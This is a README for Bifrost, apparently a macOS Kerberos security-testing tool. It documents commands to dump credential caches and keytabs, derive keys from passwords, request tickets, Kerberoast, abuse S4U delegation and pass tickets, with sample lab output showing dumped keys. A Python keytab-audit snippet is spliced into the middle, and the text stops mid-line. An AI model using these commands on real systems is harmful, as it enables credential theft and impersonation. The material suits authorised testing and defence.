
Bifrost

Objective-C library and console to interact with Heimdal APIs for macOS Kerberos

README

Bifrost

  ___         ___                   _   
 (  _`\  _  /'___)                 ( )_ 
 | (_) )(_)| (__  _ __   _     ___ | ,_)
 |  _ <'| || ,__)( '__)/'_`\ /',__)| |  
 | (_) )| || |   | |  ( (_) )\__, \| |_ 
 (____/'(_)(_)   (_)  `\___/'(____/`\__)
                                        
Usage:
./bifrost -action [dump | list | askhash | describe | asktgt | asktgs | s4u | ptt | remove]
For dump action:
    -source [tickets | keytab]
        for keytab, optional -path to specify a keytab
        for tickets, optional -name to specify a ccache entry to dump
For list action:
     no other options are necessary
For askhash action:
    -username a.test -password 'mypassword' -domain DOMAIN.COM
         optionally specify -enctype [aes256 | aes128 | rc4] or get all of them
         optionally specify -bpassword 'base64 of password' in case there might be issues with parsing or special characters
For asktgt action:
    -username a.test -domain DOMAIN.COM
         if using a plaintext password, specify -password 'password'
         if using a hash, specify -enctype [aes256 | aes128 | rc4] -hash [hash_here]
             optionally specify -tgtEnctype [aes256|aes128|rc4] to request a TGT with a specific encryption type
             optionally specify -supportAll false to indicate that you want a TGT to match your hash enctype, otherwise will try to get AES256
         if using a keytab, specify -enctype and -keytab [keytab path] to pull a specific hash from the keytab
             optionally specify -tgtEnctype [aes256|aes128|rc4] to request a TGT with a specific encryption type
             optionally specify -supportAll false to indicate that you want a TGT to match your hash enctype, otherwise will try to get AES256
For describe action:
    -ticket base64KirbiTicket
For asktgs action:
    -ticket [base64 of TGT]
    -service [comma separated list of SPNs]
     optionally specify -connectDomain to connect to a domain other than the one specified in the ticket
     optionally specify -serviceDomain to request a service ticket in a domain other than the one specified in the ticket
     optionally specify -kerberoast true to indicate a request for rc4 instead of aes256
For s4u:
    -ticket [base64 of TGT]
    -targetUser [target user in current domain, or targetuser@domain for a different domain]
    -spn [target SPN] (if this isn't specified, just a forwardable S4U2Self ticket is requested as targetUser)
     optionally specify -connectDomain [domain or host to connect to]
For ptt:
    -ticket [base64 of kirbi ticket]
     optionally specify -name [name] to import the ticket into a specific credential cache
     optionally specify -name new to import the ticket into a new credential cache
For remove:
     for tickets: -source tickets -name [name here] (removes an entire ccache)
     for keytabs: -source keytab -principal [principal name] (removes all entries for that principal)
     for keytabs: optionally specify -name to not use the default keytab
     you can't remove a specific ccache principal entry since it seems to not be implemented in heimdal

Overview

Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. Bifrost compiles into a static library (but you can change that to a dylib if needed), and bifrostconsole is a simple console project that uses the Bifrost library. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target.

Since this needs to be compiled on a Mac, and that might not be easily available to everybody for testing purposes, I've included a compiled version of the console and the library in the "compiled_binaries" folder. Since these are pre-compiled, expect them to be heavily signatured and only usable for personal testing purposes.

list

The -action list command will loop through all of the credential caches in memory and give basic information about each cache and each entry within. It will also identify the default cache with the [*] marker and each other cache with the [+] marker.

spooky:~ lab_admin$ ./bifrost -action list
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 


[*] Principal: lab_admin@LAB.LOCAL
    Name: API:A74E8799-8173-4D1A-8C7D-AFD2D8B003F3
    Issued             Expires                Principal                    Flags
2019-11-13 18:00:20PST    2019-11-14 04:00:20PST    krbtgt/LAB.LOCAL@LAB.LOCAL    (forwardable renewable initial pre-auth )
1970-12-31 16:00:00PST    2019-12-13 18:00:21PST    krb5_ccache_conf_data/kcm-status@X-CACHECONF:    ()

dump

The -action dump command can extract information about keytabs or credential caches based on the flags.

tickets

To dump tickets specifically, use -source tickets. By default, this will only iterate through the default credential cache. The default credential cache can be identified by running -action list and looking for the cache marked with [*]. To dump a specific credential cache, use the -name [name here] flag.

Each ticket will be described and dumped into a base64 Kirbi format that can then be used for other commands or with other tools on Windows.

spooky:~ lab_admin$ ./bifrost -action dump  -source tickets
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 


Client: lab_admin@LAB.LOCAL
Principal: krbtgt/LAB.LOCAL@LAB.LOCAL
Key enctype: aes256
Key: DUpykxCguZ9JtWML38nygb5Yyhvd1nGvy+MGReD7sXU= (0D4A729310A0B99F49B5630BDFC9F281BE58CA1BDDD671AFCBE30645E0FBB175)
Expires: 2019-11-14 12:00:20 GMT
Flags: forwardable renewable initial pre-auth 
Kirbi:
doIFIDCCBRygBgIEAAA<...snip...>TE9DQUw=


Client: lab_admin@LAB.LOCAL
Principal: krb5_ccache_conf_data/kcm-status@X-CACHECONF:
Key enctype: 0
Key:  ()
Expires: 2019-12-14 02:00:21 GMT
Flags: 
Principal type: kcm-status
Ticket Data: 
a3JiNQAAAAEAAAAA

keytab

To dump keytab keys, use the -source keytab parameter. By default, this will attempt to dump information from the default keytab (/etc/krb5.keytab) which is only readable by root. To specify another keytab, use the -path /path/to/keytab argument.

Each keytab entry will be described and the key will be dumped in base64 and hex.

spooky:~ lab_admin$ ./bifrost -action dump -source keytab -path test
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 

[*] Resolving keytab path
[+] Successfully opened keytab
[+] principal: lab_admin@LAB.LOCAL
    Entry version: 3
    Key enctype: aes256
    Key: 2DE49D76499F89DEA6DFA62D0EA7FEDFD108EC52936740E2450786A92616D1E1
    Timestamp: 2019-11-10 04:58:09 GMT
bash-3.2$ sudo ./bifrost -action dump -source keytab
 ___         ___                   _     
(  _`\  _  /'___)                 ( )_  
| (_) )(_)| (__  _ __   _     ___ | ,_)  
|  _ <'| || ,__)( '__)/'_`\ /',__)| |   
| (_) )| || |   | |  ( (_) )\__, \| |_ 
(____/'(_)(_)   (_)  `\___/'(____/\__) 

[*] Resolving default keytab path
[+] Successfully opened keytab
[+] principal: afpserver/LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47@LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47
    Entry version: 2
    Key enctype: aes256
    Key: 75769776DD087E3C951C514F5DB8A8FAC9DF7BF0EC6FA50A8362C456146B833B
    Timestamp: 2018-10-27 03:26:13 GMT
[+] principal: cifs/LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47@LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47
    Entry version: 2
    Key enctype: aes256
    Key: 75769776DD087E3C951C514F5DB8A8FAC9DF7BF0EC6FA50A8362C456146B833B
    Timestamp: 2018-10-27 03:26:13 GMT
    <...snip...>
[+] principal: spooky$@LAB.LOCAL
    Entry version: 2
    Key enctype: rc4
    Key: A12AD40BD124E6A9A14D65504E8EA30A
    Timestamp: 2019-11-14 02:11:20 GMT
[+] principal: spooky$@LAB.LOCAL
    Entry version: 2
    Key enctype: aes256
    Key: C1BF6861A00B35A97483E820863FAD4ED57831D935DBFE2D501727C678503F73
    Timestamp: 2019-11-14 02:11:20 GMT
[+] principal: spooky$@LAB.LOCAL
    Entry version: 2
    Key enctype: aes128
    Key: 1F44A5E5C7919C00F3166A1344D4FFDA
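As an added example (not Bifrost's own code), a small Python checker for the two dump formats above: it confirms that the base64 and hex forms of a ticket key from a tickets dump agree, and it parses a keytab dump to flag legacy rc4 entries, keys whose length does not fit their enctype, and one key shared by several principals. The sample dump is constructed from the README's own output.

```python
import base64
import re
from collections import defaultdict

# Key lengths in bytes for the enctype names Bifrost prints.
KEY_SIZES = {"aes256": 32, "aes128": 16, "rc4": 16}
# Constructed sample: a shortened Bifrost keytab dump built from the README's values.
SAMPLE_KEYTAB_DUMP = """\
[+] principal: afpserver/LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47@LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47
    Key enctype: aes256
    Key: 75769776DD087E3C951C514F5DB8A8FAC9DF7BF0EC6FA50A8362C456146B833B
[+] principal: cifs/LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47@LKDC:SHA1.B58C56AD77898DE69AAEFD22A538D6EDDEFF8D47
    Key enctype: aes256
    Key: 75769776DD087E3C951C514F5DB8A8FAC9DF7BF0EC6FA50A8362C456146B833B
[+] principal: spooky$@LAB.LOCAL
    Key enctype: rc4
    Key: A12AD40BD124E6A9A14D65504E8EA30A
    Timestamp: 2019-11-14 02:11:20 GMT
"""

def ticket_key_matches(b64_key, hex_key):
    # A tickets dump prints the session key as 'base64 (hex)'; both must decode to the same bytes.
    return base64.b64decode(b64_key).hex().upper() == hex_key.upper()

def parse_keytab_dump(text):
    # Each '[+] principal:' line opens an entry; the indented 'Field: value' lines belong to it.
    entries = []
    for line in text.splitlines():
        m = re.match(r"(?:\[\+\] )?\s*(principal|Entry version|Key enctype|Key|Timestamp): ?(.*)$", line)
        if m and m.group(1) == "principal":
            entries.append({})
        if m and entries:
            entries[-1][m.group(1)] = m.group(2).strip()
    return entries

def audit_keytab(entries):
    # Flag legacy rc4 keys, keys whose length does not fit the enctype, and a key reused by several principals.
    findings, by_key = [], defaultdict(set)
    for e in entries:
        enc, key = e.get("Key enctype", "?"), e.get("Key", "")
        key_len = len(key) // 2 if re.fullmatch(r"(?:[0-9A-Fa-f]{2})+", key) else -1
        if key_len != KEY_SIZES.get(enc):
            findings.append(f"{e['principal']}: {enc} key has unexpected length {key_len}")
        if enc == "rc4":
            findings.append(f"{e['principal']}: legacy rc4 key present")
        by_key[key].add(e["principal"])
    for key, owners in by_key.items():
        if len(owners) > 1:
            findings.append(f"key {key[:8]}... shared by {', '.join(sorted(owners))}")
    return findings
```

Feed it the raw text of a dump run to review which principals still carry rc4 keys before disabling that enctype on the realm.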

askhash

The -action askhash command will compute the hashes (Kerberos keys) used to request TGTs and decrypt responses. This command requires the plaintext password with -password [password here], but if the password contains special characters that might cause parsing issues, you can instead supply a base64 encoded version of the password with -bpassword [base64 password here]. You must also supply the -username [username] and -domain fqdn parameters so that the proper salt can be generated.

If you want to get the hashes for a computer$ account, make sure to include the $ in the username. The salt for a computer account is different from the salt for a user account.

spooky:
